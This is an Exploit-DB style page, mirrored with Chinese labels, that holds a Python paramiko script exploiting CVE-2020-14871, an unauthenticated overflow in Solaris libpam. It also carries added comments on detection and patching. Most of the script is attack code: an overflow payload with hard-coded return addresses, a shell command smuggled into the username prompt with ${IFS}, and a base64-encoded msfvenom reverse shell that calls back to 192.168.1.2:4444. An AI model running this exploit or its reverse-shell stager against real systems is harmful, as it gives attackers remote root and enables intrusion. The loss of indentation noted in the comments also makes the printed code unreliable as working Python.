Solaris SunSSH 11.0 x86 – libpam Remote Root (2)

  • 作者: legend
    日期: 2021-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49896/
  • # Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
    # Original Exploit Author: Hacker Fantastic
    # Metasploit Module Author: wvu 
    # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
    # Version: 10
    # Tested on: SunOS solaris 10
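    # CVE: CVE-2020-14871
    # Note: CVE-2020-14871 is a flaw in the Solaris PAM library (libpam) affecting
    # Solaris 10 and 11. Oracle fixed it in the October 2020 Critical Patch Update.
    # Applying that update is the remediation.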
    # Ported By: legend
    
    import socket
    import paramiko
    from time import sleep
    
    # Builds the single byte string that is later returned as the answer to the
    # server's user-name prompt (see inter_handler below).
    # Layout visible here: 516 filler bytes, eight hard-coded 4-byte values, then
    # shell command text.
    # NOTE(review): the 4-byte values look like addresses tied to the one build
    # named in the header ("Tested on: SunOS solaris 10", x86); their individual
    # meaning cannot be derived from this page.
    # Detection: a user name longer than PAM_MAX_RESP_SIZE (512 bytes), or one
    # carrying raw non-printable bytes, is not something a legitimate login
    # produces and is worth alerting on at the SSH/PAM layer.
    payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
    # "${IFS}" appears where a space would normally separate shell words; that
    # literal token inside a user-name field is a useful log/IDS indicator.
    payload+=b"python${IFS}-c${IFS}\""
    
    # msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
    # Per the msfvenom line above, the base64 blob is a generated Python stager
    # that connects back to 192.168.1.2:4444 (the author's lab values).
    # On a host this would presumably show up as a python process spawned under
    # sshd making an outbound TCP connection - confirm against local telemetry.
    payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
    # Closes the double quote opened after "-c" above.
    payload+=b"\""
    
    # Prints the total size of the assembled byte string.
    print("Length => %d" % (len(payload)))
    # Callback passed to paramiko's Transport.auth_interactive() (see the call
    # at the end of the script). paramiko invokes it with the server's
    # keyboard-interactive title, instructions and a list of (prompt, echo)
    # pairs, and expects one response per prompt.
    # NOTE(review): the page has lost this function's indentation. As printed it
    # is not valid Python, and which statements belong to the loop and to the
    # `if` cannot be recovered from the page.
    # Security-relevant point: the oversized value is supplied as the reply to
    # the "Please enter user name:" prompt, i.e. before any credential has been
    # checked, so the issue is reachable without authentication.
    def inter_handler(title, instructions, prompt_list):
    resp = []#Initialize the response container
    for pr in prompt_list:
    print(pr)
    # pr[0] is the prompt text; only the user-name prompt is matched.
    if pr[0].startswith('Please enter user name:'):
    # Fixed 10-second pause before answering; the reason is not stated on the page.
    sleep(10) 
    resp.append(payload)
    print("Your payload is sended check your nc")
    return tuple(resp)
    
    # Opens a TCP connection to port 22 and starts keyboard-interactive
    # authentication with an empty user name, handing prompts to inter_handler.
    # NOTE(review): `socket` is already imported at the top of the script; this
    # second import is redundant.
    import socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 192.168.1.2 is a private-range lab address; it is also the LHOST value in
    # the msfvenom comment earlier in the script.
    sock.connect(("192.168.1.2", 22))
    ts = paramiko.Transport(sock)
    ts.start_client(timeout=10)
    # username="" means no user name is sent up front; presumably this is what
    # makes the server issue the user-name prompt that inter_handler matches.
    # Defender notes: the fix is Oracle's October 2020 Critical Patch Update.
    # Where keyboard-interactive authentication is not needed, disabling it in
    # sshd_config (ChallengeResponseAuthentication / KbdInteractiveAuthentication
    # set to "no") is the reported workaround for the SSH path only; other
    # PAM consumers are not covered by it.
    # In logs, look for keyboard-interactive attempts with an empty initial user
    # name followed by an sshd crash or an unexpected child process.
    ts.auth_interactive(username="", handler=inter_handler)